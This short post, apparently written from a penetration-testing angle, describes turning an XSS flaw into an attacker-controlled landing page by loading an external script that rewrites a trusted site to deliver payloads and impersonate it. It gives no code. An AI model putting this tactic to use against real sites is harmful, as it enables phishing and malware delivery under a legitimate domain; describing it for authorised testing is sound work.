XSS to RCE: Covert Target Websites into Payload Landing Pages.
I recently came upon an interesting post about a threat actor’s tactic of converting a vulnerable website into a great payload landing page. With some variation, using a XSS vulnerability you can load an external JavaScript file, which creates a “new page” that you control for your pretext. The benefit of this tactic is that your landing page URL can still point to your client domain, but it can load whatever HTML code you want, download a payload file, masquerade as the real site, etc.
The impact to XSS isn’t always something like session stealing, sometimes it’s a whole new vector.
This post was created with our nice and easy submission form. Create your post!
GIPHY App Key not set. Please check settings